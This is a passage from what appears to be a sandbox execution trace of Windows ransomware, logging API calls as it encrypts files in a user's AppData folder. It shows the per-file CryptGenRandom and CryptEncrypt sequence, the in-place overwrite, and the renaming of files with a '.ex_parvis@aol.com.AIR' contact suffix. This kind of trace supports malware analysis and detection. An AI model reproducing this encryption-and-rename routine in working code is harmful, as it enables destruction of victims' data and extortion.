lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x10479, lpOverlapped=0x0) returned 1 [0167.065] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.065] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.065] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3", dwFileAttributes=0x80) returned 1 [0167.065] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3") returned 70 [0167.065] GetProcessHeap () returned 0x2e0000 [0167.065] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf2) returned 0x319820 [0167.065] lstrcpyW (in: lpString1=0x319820, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3" [0167.065] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.065] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\s fcr0sfmniqypgr4g1.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\s fcr0sfmniqypgr4g1.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.069] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\s fCR0sfmniqYpGR4g1.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\s fcr0sfmniqypgr4g1.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.069] GetProcessHeap () returned 0x2e0000 [0167.069] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319820 | out: hHeap=0x2e0000) returned 1 [0167.069] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=47351) returned 1 [0167.069] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb8f7 [0167.069] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.069] GetProcessHeap () returned 0x2e0000 [0167.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.069] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.069] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.070] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.070] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.070] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xb8f7, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xb8f7, lpOverlapped=0x0) returned 1 [0167.071] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-47351, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.071] WriteFile (in: hFile=0x52c, lpBuffer=0x3bdd10*, nNumberOfBytesToWrite=0xb8f7, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bdd10*, lpNumberOfBytesWritten=0x2acf9c8*=0xb8f7, lpOverlapped=0x0) returned 1 [0167.072] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.072] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.072] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv", dwFileAttributes=0x80) returned 1 [0167.073] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv") returned 68 [0167.073] GetProcessHeap () returned 0x2e0000 [0167.073] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x319788 [0167.073] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv" [0167.073] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv.12781717671972518758.ex_parvis@aol.com.AIR" [0167.073] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rwihzvcuhb7kjynzh.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rwihzvcuhb7kjynzh.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.079] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RwihZVCuhB7KjyNzh.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\rwihzvcuhb7kjynzh.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.079] GetProcessHeap () returned 0x2e0000 [0167.079] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.079] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=62202) returned 1 [0167.079] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf2fa [0167.079] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.079] GetProcessHeap () returned 0x2e0000 [0167.079] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.079] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.080] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.080] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.080] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.081] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xf2fa, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xf2fa, lpOverlapped=0x0) returned 1 [0167.083] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-62202, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.083] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xf2fa, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xf2fa, lpOverlapped=0x0) returned 1 [0167.084] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.084] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.084] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf", dwFileAttributes=0x80) returned 1 [0167.084] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf") returned 66 [0167.084] GetProcessHeap () returned 0x2e0000 [0167.084] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x319d20 [0167.084] lstrcpyW (in: lpString1=0x319d20, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf" [0167.085] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.085] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oy3eiol4rkymijt.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oy3eiol4rkymijt.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.088] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oY3eIoL4RkYMIJT.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oy3eiol4rkymijt.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.088] GetProcessHeap () returned 0x2e0000 [0167.088] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d20 | out: hHeap=0x2e0000) returned 1 [0167.088] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8742) returned 1 [0167.088] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2226 [0167.088] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.088] GetProcessHeap () returned 0x2e0000 [0167.088] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.088] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.088] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.089] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.089] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.089] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x2226, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x2226, lpOverlapped=0x0) returned 1 [0167.089] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-8742, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.089] WriteFile (in: hFile=0x52c, lpBuffer=0x3b4640*, nNumberOfBytesToWrite=0x2226, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b4640*, lpNumberOfBytesWritten=0x2acf9c8*=0x2226, lpOverlapped=0x0) returned 1 [0167.090] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.091] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.091] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx", dwFileAttributes=0x80) returned 1 [0167.091] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx") returned 56 [0167.091] GetProcessHeap () returned 0x2e0000 [0167.091] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd6) returned 0x30a530 [0167.091] lstrcpyW (in: lpString1=0x30a530, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx" [0167.091] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx.12781717671972518758.ex_parvis@aol.com.AIR" [0167.091] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oshg.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oshg.docx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.094] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oSHg.docx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oshg.docx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.094] GetProcessHeap () returned 0x2e0000 [0167.094] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a530 | out: hHeap=0x2e0000) returned 1 [0167.094] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=31836) returned 1 [0167.094] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7c5c [0167.094] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.094] GetProcessHeap () returned 0x2e0000 [0167.094] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.094] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.094] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.095] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.095] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.096] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x7c5c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x7c5c, lpOverlapped=0x0) returned 1 [0167.097] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.097] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.097] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3", dwFileAttributes=0x80) returned 1 [0167.097] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3") returned 62 [0167.098] GetProcessHeap () returned 0x2e0000 [0167.098] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe2) returned 0x3ac428 [0167.098] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3" [0167.098] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.098] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ol xycisobg.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ol xycisobg.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.101] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oL XyCIsoBG.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ol xycisobg.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.101] GetProcessHeap () returned 0x2e0000 [0167.101] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.101] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2710) returned 1 [0167.101] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa96 [0167.101] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.101] GetProcessHeap () returned 0x2e0000 [0167.101] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.101] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.101] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.102] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.102] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.102] ReadFile (in: hFile=0x52c, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0xa96, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0xa96, lpOverlapped=0x0) returned 1 [0167.102] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-2710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.102] WriteFile (in: hFile=0x52c, lpBuffer=0x3b2410*, nNumberOfBytesToWrite=0xa96, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesWritten=0x2acf9c8*=0xa96, lpOverlapped=0x0) returned 1 [0167.102] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.103] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.103] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nRtxrLkTUeM6kCWQ_.wav", dwFileAttributes=0x80) returned 1 [0167.103] lstrlenW 